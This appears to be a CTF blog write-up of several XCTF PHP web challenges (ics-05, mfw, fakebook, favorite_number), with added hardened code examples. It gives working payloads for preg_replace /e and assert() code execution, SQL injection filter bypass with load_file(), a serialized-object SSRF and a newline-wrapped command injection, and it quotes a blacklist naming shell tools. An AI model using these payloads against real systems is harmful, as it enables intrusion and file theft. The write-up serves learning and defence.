XCTF Web Record (Day 4, Day 5)

ics-05

Challenge description: other saboteurs will use the back door of the industrial cloud management system's equipment maintenance center to invade the system.

So after opening it, click directly on the equipment maintenance center and view the page source; a suspicious point was found.

Try to read the source code of index.php through the php://filter pseudo-protocol (stream wrapper):

?page=php://filter/read=convert.base64-encode/resource=index.php

This returns the source base64-encoded; decode it (key part):

<?php

$page = $_GET[page];

if (isset($page)) {

    if (ctype_alnum($page)) {
?>
<?php
    } else {
?>
                <?php
                if (strpos($page, 'input') > 0) {
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
                    die();
                }

                if (strpos($page, 'text') > 0) {
                    die();
                }

                if ($page === 'index.php') {
                    die('Ok');
                }
                include($page);
                die();
                ?>

<?php
}}

// Conveniently implements input and output; a feature still under development that only internal staff may test

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    } else {
        die();
    }

}

?>

Note that the X-Forwarded-For check can be satisfied by forging the header: capture the request and add X-Forwarded-For: 127.0.0.1.

Then use the weakness of preg_replace(): with the /e modifier, preg_replace() evaluates the replacement parameter as PHP code after substitution (the modifier was deprecated in PHP 5.5 and removed in PHP 7.0), and here both the pattern and the replacement come straight from the query string.

Try to construct the payload:

?pat=/123/e&rep=system('ls')&sub=1234

?pat=/123/e&rep=system("cd%20s3chahahaDir%26%26%20ls")&sub=1234
// %26 is the URL encoding of &

?pat=/123/e&rep=system("cd%20s3chahahaDir/flag%26%26%20ls")&sub=1234

?pat=/123/e&rep=system("cat%20s3chahahaDir/flag/flag.php")&sub=1234
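As an added example (not the challenge's code), here is how the admin search-and-replace feature could be written so that neither the header spoof nor the /e trick works; the parameter names pat, rep and sub follow the original, everything else is assumed.

```php
<?php
// Added example, not the challenge's code: hardened admin search-and-replace for ics-05.

// X-Forwarded-For is written by whoever sends the request (or by a proxy it passed
// through), so it proves nothing. REMOTE_ADDR is the TCP peer the server itself saw.
function isLocalAdmin(array $server): bool
{
    return ($server['REMOTE_ADDR'] ?? '') === '127.0.0.1';
}

// Accept only "/body/" plus a known-safe modifier set. The e modifier (deprecated in
// PHP 5.5, removed in 7.0) is refused, as is any other unexpected character.
function isSafePattern(string $pattern): bool
{
    if (!preg_match('~\A/(.*)/([imsux]*)\z~s', $pattern, $m)) {
        return false;
    }
    // Also make sure PCRE compiles it; @ keeps a compile warning from reaching the client.
    return @preg_match('/' . $m[1] . '/' . $m[2], '') !== false;
}

// The replacement goes through a callback, so it stays plain text and is never evaluated.
function safeReplace(string $pattern, string $replacement, string $subject): ?string
{
    if (!isSafePattern($pattern)) {
        return null;
    }
    // preg_replace_callback() returns null on a PCRE error (e.g. the backtrack limit),
    // which is the remaining risk of a user-supplied pattern; treat it as a bad request.
    return preg_replace_callback(
        $pattern,
        function (array $m) use ($replacement) { return $replacement; },
        $subject
    );
}

if (isLocalAdmin($_SERVER)) {
    $result = safeReplace($_GET['pat'] ?? '', $_GET['rep'] ?? '', $_GET['sub'] ?? '');
    if ($result === null) {
        http_response_code(400);
        die('bad pattern');
    }
    echo htmlspecialchars($result, ENT_QUOTES, 'UTF-8');
}
```

Even without /e, letting users supply a pattern leaves regex denial of service on the table, so a fixed set of server-side patterns is the better design when the feature allows it.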


mfw

Open the page; there is an about page, so there may be a source code leak.

Use GitHack to download its source code. There is a flag.php, but opening it gives no useful information.

Open index.php and get:

<?php

if (isset($_GET['page'])) {
    $page = $_GET['page'];
} else {
    $page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>

This is the exploitable point of the challenge.

strpos() returns the position of the first occurrence of one string inside another.
$file is built by string concatenation, so $page lands inside the quoted string that assert() receives.
assert() checks whether an assertion is FALSE.
When given a string, assert() executes that string as PHP code and returns true or false, so a single quote in $page can terminate the literal and append arbitrary code.

There is no filtering of the quote character here, so construct the payload:

'.system("cat ./templates/flag.php").'
1') or system('cat templates/flag.php');//
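The same template-loading mistake appears in both challenges so far: ics-05 blacklists a few strings before include() (bypassed with php://filter; its strpos(...) > 0 test also misses a match at position 0) and mfw interpolates the path into a string passed to assert(). As an added example, not code from either challenge, here is one loader that closes both; the templates/ layout follows mfw and everything else is assumed.

```php
<?php
// Added example, not from either challenge: a page loader without a blacklist and
// without a string-form assert() (string arguments to assert() are eval'd, which is
// what mfw's payload abuses; PHP 8 no longer accepts them at all).

const TEMPLATE_DIR = __DIR__ . '/templates';

// Returns the resolved path of templates/<page>.php, or null when it must be refused.
function resolveTemplate(string $page): ?string
{
    // 1. Whitelist the name. Without '/', '.', ':' or quotes there is no php:// or data:
    //    wrapper, no '..' traversal, and no quote to break out of a string with.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/i', $page)) {
        return null;
    }
    $base = realpath(TEMPLATE_DIR);
    $real = realpath(TEMPLATE_DIR . '/' . $page . '.php');
    // 2. realpath() resolves symlinks as well as '..', so confirm the resolved file still
    //    sits under templates/ (a symlinked template pointing elsewhere is refused).
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

$page = $_GET['page'] ?? 'home';
$file = resolveTemplate($page);
if ($file === null) {
    http_response_code(404);
    die("That file doesn't exist!");
}
// Anything inside templates/ is reachable by name, so secrets do not belong there.
include $file;
```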

fakebook

View the source code. Inputting a into the no parameter produces an error, so there is SQL injection; from the normal responses it is judged that there are 4 columns.

Using union injection, it is found that there is filtering; this payload is blocked:

?no=-1 union select 1,2,3,4#

So the filter must be matching the string union select; try to bypass it with an inline comment between the two keywords, and find that this works:

?no=-1 union/**/select 1,2,3,4#

The remaining steps are routine and are not recorded here.

Finally got the result:
the stored data is serialized, and it is found that the content is actually what we registered (I scribbled when I registered here).

Thinking of checking robots.txt, I got something: the source code is leaked.

<?php

class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

Analyze the code carefully and think about how to exploit it.

It seems that the blog field is validated by isValidBlog() before get() fetches it with curl.

The registered information is serialized for storage.

We also know the absolute path: /var/www/html/.

flag.php is under this path.

We can use the MySQL load_file() function to read it directly:

?no=100 union/**/select 1,load_file('/var/www/html/flag.php'),3,4 #

The intended point of this challenge is actually SSRF. I don't know the specifics very well. The construction:

?no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
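As an added example (not the challenge's code), here are hardened versions of the two fakebook weak points: the ?no= lookup becomes a prepared statement, and the blog fetch refuses every scheme but http/https both before and inside curl, so a file:// value smuggled in through a serialized object is never fetched. It assumes the UserInfo class above is loaded; the PDO handle $pdo and a users table with columns no and data are assumptions.

```php
<?php
// Added example, not the challenge's code: hardened fakebook data access and blog fetch.
// Assumed: the page's UserInfo class, a PDO connection $pdo and a table users(no, data).

// Validate the parsed URL instead of the loose regex in isValidBlog(): only http(s)
// with a host component is accepted, so "file:///var/www/html/flag.php" fails here.
function isValidBlogStrict(string $blog): bool
{
    $u = parse_url($blog);
    if ($u === false || !isset($u['scheme'], $u['host'])) {
        return false;
    }
    return in_array(strtolower($u['scheme']), ['http', 'https'], true);
}

// Enforce the scheme inside curl as well: a value that bypassed validation (stored via
// SQL injection, or a tampered serialized UserInfo) must not turn curl into a file reader.
function fetchBlog(string $url)
{
    if (!isValidBlogStrict($url)) {
        return false;
    }
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION  => false,  // a redirect to an internal address is still SSRF
        CURLOPT_TIMEOUT         => 5,
    ]);
    $out = curl_exec($ch);
    curl_close($ch);
    return $out;
}

// ?no= goes through a prepared statement: "union/**/select" is just a value that fails
// the digit check, and there is no query string left for a comment trick to rewrite.
function loadUser(PDO $pdo, string $no): ?UserInfo
{
    if (!ctype_digit($no)) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT data FROM users WHERE no = ?');
    $stmt->execute([(int)$no]);
    $data = $stmt->fetchColumn();
    if ($data === false) {
        return null;
    }
    // Restrict unserialize() to the one class we expect (PHP 7+) and re-check the blog.
    $user = unserialize($data, ['allowed_classes' => ['UserInfo']]);
    return ($user instanceof UserInfo && isValidBlogStrict($user->blog)) ? $user : null;
}
```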

Let's stop here with this question for now and learn more about it later.

Cat

Stupid one!


favorite_number

A code audit question

<?php
//php5.5.9
$stuff = $_POST["stuff"];
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') {
    $num= $_POST["num"];
    if (preg_match("/^\d+$/im",$num)){
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){
            echo "my favorite num is:";
            system("echo ".$num);
        }else{
            echo 'Bonjour!';
        }
    }
} else {
    highlight_file(__FILE__);
}

There are several places that need to be bypassed; analyze them one by one:

if($stuff === $array && $stuff[0] != 'admin')

$stuff must be identical (===) to the array $array, yet its first element must not equal admin.

The comment hints at PHP 5.5.9; look up the bypass method.

The general meaning is:

In an array, a[0] === a[0x1000000000] // bool(true)

So construct the payload:

stuff[4294967296]=admin&stuff[1]=user&num=111

The first bypass is successful.

Next, bypass the regular expressions:

if (preg_match("/^\d+$/im",$num)){
    if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num))

The requirement is that the value is a number and does not contain certain characters.

The first regex uses the m modifier, so ^ and $ match at line boundaries rather than only at the ends of the whole string, and a value whose first line is all digits passes. So we can use %0a (a newline) to wrap and bypass the first regex:

stuff[4294967296]=admin&stuff[1]=user&num=111%0a ls /

The hackbar seems to be useless here.

Learned a new technique here: list inode numbers with the -i option of ls:

stuff[4294967296]=admin&stuff[1]=user&num=111%0a ls -i /

Backticks execute the inner command, and more reads the file that find locates by inode number (the blacklist blocks both flag and cat, which is why the file is located by inode and read with more):

stuff[4294967296]=admin&stuff[1]=user&num=111%0a more `find / -inum 31458297`
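As an added example (not the challenge's code), the number check from favorite_number beside a strict one, plus the output path without a shell; isDigitsWeak reproduces the original check and everything else is assumed. The weak check accepts "111\n ls /" because the m modifier lets $ match before a newline, while \A...\z and ctype_digit both refuse it.

```php
<?php
// Added example, not the challenge's code: why /^\d+$/im lets "111\n ls /" through,
// and what the favorite_number handler looks like without a shell.

// With the m modifier, ^ and $ match at line boundaries, so a value whose first line is
// digits passes no matter what follows the newline. Even without m, a plain $ still
// matches before one trailing "\n" unless the D modifier is set.
function isDigitsWeak(string $num): bool
{
    return preg_match('/^\d+$/im', $num) === 1;
}

// \A and \z anchor to the absolute start and end of the string; ctype_digit agrees.
function isDigitsStrict(string $num): bool
{
    return preg_match('/\A\d+\z/', $num) === 1 && ctype_digit($num);
}

// The original echoes through system(), so the blacklist of sh|cat|echo|... has to
// guess every way a shell can be driven. With no shell there is nothing to blacklist.
function showFavorite(string $num): string
{
    if (!isDigitsStrict($num)) {
        return 'Bonjour!';
    }
    return 'my favorite num is: ' . $num;
}

// Constructed inputs: the plain number, a trailing newline, and the newline-wrapped
// command from the write-up. Only the first passes the strict check.
foreach (["111", "111\n", "111\n ls /"] as $num) {
    printf("%-14s weak=%d strict=%d\n", json_encode($num),
        isDigitsWeak($num), isDigitsStrict($num));
}
```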

Summary of this question:

It examined the array key overflow problem,
and I learned a new technique for reading files.

Postscript:

I only recorded one question today, because the later questions became difficult for me, so I will record one question every day, understand each question, understand the questions recorded before, and review them.


Origin: blog.csdn.net/qq_45742511/article/details/114370992